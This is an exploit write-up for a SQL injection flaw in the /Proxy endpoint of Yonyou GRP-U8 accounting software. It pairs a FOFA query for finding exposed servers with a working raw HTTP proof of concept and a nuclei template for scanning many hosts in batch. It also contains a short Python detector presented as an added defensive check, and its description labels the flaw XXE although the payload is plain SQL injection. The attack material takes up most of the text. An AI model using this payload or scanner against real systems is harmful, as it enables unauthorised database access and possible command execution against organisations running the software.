Yonyou GRP-U8 Proxy SQL Injection CNNVD-201610-923
Vulnerability description
Yonyou GRP-U8 has an XXE vulnerability. The flaw arises because the application does not disable the loading of external entities when parsing XML input, which allows external SQL statements to be loaded, as well as command execution.
Affected versions
Yonyou GRP-U8 Administrative Institution Internal Control Management Software, New Government Accounting System edition (用友GRP-U8行政事业内控管理软件(新政府会计制度专版))
Reproduction
FOFA query: title="用友GRP-U8行政事业内控管理软件"
Login page:
PoC:
POST /Proxy HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Content-Length: 352
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
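As an added defensive example (not part of the original write-up or of any Yonyou code), the following Python check recognises the request shape shown in the PoC above: it parses the dp form field as XML and flags an AS_DataRequest whose ProviderName is DataSetProviderData and whose Data field begins with an SQL statement. The sample bodies are constructed, and the function name is an assumption of this example, suitable for a WAF hook or for reviewing captured POST bodies.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# SQL verbs an untrusted client has no business placing in the Data field.
SQL_VERBS = re.compile(r"^\s*(select|insert|update|delete|exec|execute|declare|drop)\b", re.I)
XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def is_suspicious_proxy_body(body: str) -> bool:
    """True when a /Proxy form body carries AS_DataRequest -> DataSetProviderData with SQL in Data."""
    for dp in parse_qs(body, keep_blank_values=True).get("dp", []):
        # Strip the declaration so the GB2312 encoding label does not matter for str input.
        # ElementTree does not fetch external entities, so parsing the packet here is safe.
        try:
            root = ET.fromstring(XML_DECL.sub("", dp, count=1))
        except ET.ParseError:
            continue
        if root.tag != "R9PACKET":
            continue
        for fn in root.iter("R9FUNCTION"):
            if (fn.findtext("NAME") or "").strip() != "AS_DataRequest":
                continue
            # Collect PARAM name -> DATA text for this function call.
            args = {(p.findtext("NAME") or "").strip(): (p.findtext("DATA") or "")
                    for p in fn.iter("PARAM")}
            if (args.get("ProviderName", "").strip() == "DataSetProviderData"
                    and SQL_VERBS.search(args.get("Data", ""))):
                return True
    return False


# Constructed sample bodies (not captured traffic): the PoC shape, and a packet whose Data holds no SQL.
SUSPICIOUS_BODY = (
    'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1">'
    '<DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS>'
    '<PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM>'
    '<PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM>'
    '</PARAMS> </R9FUNCTION></R9PACKET>'
)
BENIGN_BODY = (
    'cVer=9.8.0&dp=<?xml version="1.0"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT>'
    '<R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME>'
    '<DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME>'
    '<DATA format="text">Customers</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
)

if __name__ == "__main__":
    for label, body in (("poc", SUSPICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, "flagged" if is_suspicious_proxy_body(body) else "clean")
```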
nuclei template for batch scanning (YAML)
id: yonyou_GRP-U8_Proxy_sqli_rce

info:
  name: yonyou_GRP-U8_Proxy_sqli_rce
  author: mczilong
  severity: critical
  description: title="用友GRP-U8行政事业内控管理软件"
  tags: yonyou,oa

requests:
  - raw:
      - |
        @timeout: 25s
        POST /Proxy HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
        Content-Length: 357
        Connection: Keep-Alive
        Cache-Control: no-cache

        cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "<SESSIONID>"
          - "ERROR"